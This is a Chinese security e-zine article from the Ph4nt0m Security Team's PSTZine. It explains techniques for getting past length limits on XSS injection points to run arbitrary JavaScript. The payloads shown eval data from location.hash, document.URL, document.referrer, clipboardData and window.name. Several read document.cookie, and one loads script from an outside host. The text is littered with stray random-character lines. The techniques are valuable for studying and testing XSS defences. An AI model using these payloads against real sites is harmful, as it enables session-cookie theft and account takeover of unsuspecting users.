[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==

& n0 l" u* p' z; S- a                       Issue 0x03, Phile #0x04 of 0x07
* Z' P0 V" {1 K# i- c

1 I9 q6 l) k3 [: d0 g; A! G|=---------------------------------------------------------------------------=|
( _! R, \9 l( `) g2 N% n5 O|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
* l; E# J0 U& I/ b$ _) P: v  ^|=------------------------=[      By luoluo     ]=---------------------------=|
|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
1 j2 E$ o/ X5 j. y- p. `6 S|=---------------------------------------------------------------------------=|
; s' M5 ~, G# K6 X

( w  o1 L# w6 j9 R+ T[目录]
5 e) }* B# T( \3 d
: Q5 |1 x- V- R1 O* a5 ]. c1. 综述
2. 突破方法
  2.1 利用HTML上下文中其他可以控制的数据
. R0 E5 v' J  d/ X; c0 M! S  |  2.2 利用URL中的数据
( n: A( l; @0 }5 p( B2 V0 E  2.3 JS上下文的利用
& U# C  y' J: z0 d# P6 C  2.4 利用浏览器特性在跨域的页面之间传递数据
5 j$ z  f# f9 B3 \1 A    2.4.1 document.referrer
    2.4.2 剪切板clipboardData
    2.4.3 窗口名window.name
  2.5 以上的方式结合使用
3. 后记
# v, e3 @( ~6 k$ {6 N) H4. 参考
. U' _3 ^  y' q# T

0 c& t7 [# ~5 h) ~一、综述
2 H$ M6 i9 r7 s4 v/ b
" N8 \6 _' p( R    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
, y; S4 f) z6 C5 ~3 x7 M4 a9 B要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
! O7 `! x; b" I4 a6 \行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
极端情况下的XSS漏洞。

    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
9 l" h# Z3 G9 d' n. K) e据。


  a- y+ B' ?9 b7 T& ~/ ]& U二、突破方法

2.1 利用HTML上下文中其他可以控制的数据
# }/ g% ]5 }# F  [0 y4 C/ I
    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：
3 d. {/ I, I- L; @+ p4 v7 [9 d7 Y
--code-------------------------------------------------------------------------
2 `7 e, W) x2 j  i8 V6 ~. ^<div id="x">可控的安全的数据</div>
2 E2 i9 E$ e; D& n<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------
/ A' U7 Z: s& ?; W3 \* a5 \* \
2 _: ?; T5 y8 w% \7 \4 g* H    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：
6 O, \2 @2 u1 c; D! G; K
--code-------------------------------------------------------------------------
<div id="x">alert%28document.cookie%29%3B</div>
; L' O- L/ D) S& l+ a  h<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
/ x) e. R" x4 \  Y1 W& {* x0 o-------------------------------------------------------------------------------
( I% T* G: |& Y2 @3 M2 e1 E
长度：28 + len(id)

- q, d. e9 V- U* X- y    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。
, U; \4 h% x4 \2 p( ]
8 @6 S9 _% z- `* W/ V+ M$ d; E
: v0 q) g  p& T& H( T% i2.2 利用URL中的数据
& {2 U' o+ Z* B: ^+ y' Q
: Q* v. L$ y* T4 l    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
4 ]" z& h7 S4 j8 v, [8 @document.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
最后：
) ?9 y: O% R1 w0 ^* }& t
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
: L9 x8 n7 p! b4 u# g4 b
6 K9 g: w/ ?- u" Y. ]<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------

. S0 b9 ?+ }$ y6 j" J7 h+ o9 B长度：30

& W7 s1 ^7 ?2 F# G, u  |--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
, l8 U9 s* w1 e3 R9 D-------------------------------------------------------------------------------

长度：31

    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
! z% R7 R/ k0 k的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
3 s9 N* S7 W) v! H* g; J字符：

--code-------------------------------------------------------------------------
2 h9 K( F& H6 c  m. _% ^<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
& N  s# G1 k. P( d9 D-------------------------------------------------------------------------------

, v: e3 q' _$ s) ]长度：29

3 |4 R: {& Q; s( c--code-------------------------------------------------------------------------
  p' Z& t$ W" O3 n/ s) H2 d( c<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
. i/ Z  K+ n2 n- C- J$ A6 I-------------------------------------------------------------------------------

长度：30

    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：

--code-------------------------------------------------------------------------
- z+ X! j4 D8 ^4 b& P3 yhttp://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
( T: `. `# X# J' M; @3 X
% Y( S+ ]! T" I" w<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------
- Q/ N2 z$ o' S
长度：29

& C8 @0 l) F0 n+ j% ~( `9 K! Y) @    这样比上面的例子又少了一个字符。那么还可以更短么？
" X; t9 K; D$ I0 V- Q. s2 w
9 L+ l! _" k  B' y. {
2.3 JS上下文的利用

) t3 X' O+ X7 n  |+ x9 }" q: c5 _    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：
7 R) H8 v% v- c$ D) e: `! U6 s
String.fromCharCode
getElementById
6 x. Y9 j( ^' a( fgetElementsByTagName
1 B, H  {% k$ P7 E4 Bdocument.write
& }6 m$ j" L/ N) \" N, D  wXMLHTTPRequest
...

    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
$ u3 G! X4 K% ]) Z4 O9 y简化函数，最经典的例子就是：

1 ]6 s( P; C8 l1 N0 C' [--code-------------------------------------------------------------------------
function $(id) {
        return document.getElementById(id);
}
-------------------------------------------------------------------------------

- }5 |+ W4 Z6 }7 i2 t  ]4 G& N8 r1 z    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：
: b9 [3 s. Z5 a& ]* Y; q" T0 ?; @$ A! L
5 {& u$ K9 @0 z" R--code-------------------------------------------------------------------------
& o( I- B' P4 J- N0 p# }' gfunction loads(url) {
" f2 N  p& E. I) _3 d        ...
& [7 }) G: F; W! @% F        document.body.appendChild(script);
}
+ h: L% ^0 u2 {
<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
-------------------------------------------------------------------------------

长度：len(函数名) + len(url) + 5

    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：
  w8 S) W" X* p2 A+ q
--code-------------------------------------------------------------------------
% G% L+ ?8 F$ q2 M+ f4 Efunction get(url) {
) m/ n* I/ i5 k& N% m        ...
        return x.responseText;
+ q7 ?( g! a3 q0 Z- X}
9 [( J  B' u5 y
+ d9 K9 _# U5 z; O7 }2 F# {5 K7 ]<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
-------------------------------------------------------------------------------

长度：len(函数名) + len(url) + 11
( s1 b6 a( E# H
5 l' Y+ R% \: O    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：

8 i: n; J! H/ z7 V# bJQuery
7 I  y* r2 X4 {  K( Z2 N; EYUI
9 n/ N, H# {" x, n$ A...

6 H0 \& K2 o3 T; G+ S, F    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
们的代码，进而突破长度限制执行任意代码。
) T3 h6 ~" V& y& V+ _8 v) c' a2 x4 I

2.4 利用浏览器特性在跨域的页面之间传递数据

0 J) u7 }; [4 S$ ^7 D- }6 v3 u) V! M- r    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
. x3 k- t6 S- }& m4 ^, U方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。

2.4.1 document.referrer
! O3 q3 }* p! N5 P0 b6 `
2 R. c  H8 B2 v% f$ N+ E    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
Payload，被XSS的页面通过referrer获取相关代码执行。
- ~% A# J/ v+ c/ p
攻击者构造的的页面：

8 ~) X: P& X" R0 D" i--code-------------------------------------------------------------------------
http://www.a.com/attack.html?...&alert(document.cookie)

% P  y9 H7 z  R5 u  b' E<a href="http://www.xssedsite.com/xssed.php">go</a>
-------------------------------------------------------------------------------

被XSS的页面：

( P6 J0 e7 }: h8 Q--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------

长度：34
& y# D1 x! A, D1 x( H- y/ D
    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
, a2 @9 B5 M' C实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
) h& {# q1 h1 ?8 [. d9 \9 l比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：
. P7 e. r. Z% {
--code-------------------------------------------------------------------------
<script type="text/javascript">
/ a$ w/ D4 k: ~6 z2 w7 i3 y<!--
window.onload = function(){
* b: w3 D$ @# _  @1 ~! J        var f = document.createElement("form");
        f.setAttribute("method", "get");
' {6 e- d% B; P/ u        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
        document.body.appendChild(f);
+ X+ k0 W- h3 ?. ^        f.submit();
};
//-->
</script>
3 z; S6 Y, @  P+ ^$ m7 r-------------------------------------------------------------------------------
. E" E- V4 Z1 W" _1 G; ?- i
6 L: |4 I7 u& z. E' ]
) r0 R0 {& J! a+ n/ U2.4.2 剪切板clipboardData

    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
取并执行该数据。
1 C; g/ G( u$ d7 f$ P4 {
& V3 U0 C. {+ n0 l) ]+ x2 `攻击者构造的页面：

% \# E7 L" B$ U4 c--code-------------------------------------------------------------------------
<script>
clipboardData.setData("text", "alert(document.cookie)");
( c2 {/ c$ H6 ~$ }: M( R</script>
- y4 W7 z8 n$ P* V) T! E' C-------------------------------------------------------------------------------

被XSS的页面：
2 c! |/ @3 W5 r) K- g* I1 a4 A3 t7 g
--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------

长度：36

6 ~; i/ F3 B4 _6 d    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。
! I% V9 q* s1 q5 ]& `
0 }" {1 L: h9 [5 M* K
2.4.3 窗口名window.name

2 x; t& {& [$ H    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
据的，但是这个特性本身并不是漏洞。
$ m$ Y0 t1 y' e5 Q; M
/ g5 \2 L  T0 m    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
0 l! z* z$ ^, E$ I需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
+ C( v. S0 n% ?8 R& D" N的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
或者VBS。
6 G7 v! G- ?# @
8 p. D1 u! ^3 o6 k3 m1 h    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
/ B+ a( C) i' k( _& l9 F限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：

攻击者构造的页面：
1 Q- V8 L8 m9 Q
3 R4 V$ K' c& w--code-------------------------------------------------------------------------
<script>
window.name = "alert(document.cookie)";
3 c* d: `* `3 g, x: h3 I  \locaton.href = "http://www.xssedsite.com/xssed.php";
</script>
! M, J! b" I3 P7 o( U-------------------------------------------------------------------------------
+ L: w! X+ q0 D4 n2 V) J3 K/ V
9 w% n( h9 n) h0 Y$ V被XSS的页面：
" G& H, d: W" Q" [7 [6 f
+ m" {1 M9 t+ b- y) X  l--code-------------------------------------------------------------------------
8 B! s$ q" c$ \3 e% E- L4 s, ?<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
6 [8 m3 O. h! O
7 T1 Q/ u* A1 Y/ u长度：11

    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
的技巧，这个技巧的发现也是促成本文的直接原因。
+ E" e- ?+ @6 g  a0 c. |4 z
    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
章来探讨。

3 ^( \& ], h! B/ W, j% v
2.5 以上的方式结合使用

& w$ W5 d' r3 v4 b& Q# F    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
中，灵活的组合上面的方法可能会起到奇效。


三、后记
# Q9 i! c. y9 I. `  x
1 D' }. u! D% j/ E- ]" E8 i2 j    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
/ U5 u$ [; `: D( A0 E乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
- M6 e6 S# ~! s; X; d7 K3 {和我交流！
+ w4 p8 ]% i: {+ T2 o
    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！

% R* U" h0 ^1 E6 I    本文是纯粹的技术探讨，请勿用于非法用途！
) Y5 ^! p/ C' j
- F1 P3 K/ Q1 K. _7 L. w7 I
* h( ?  x0 y# A四、参考

http://msdn.microsoft.com/en-us/library/aa155073.aspx
/ Z$ i, K1 [4 s6 r$ d( m' n- H6 j
-EOF-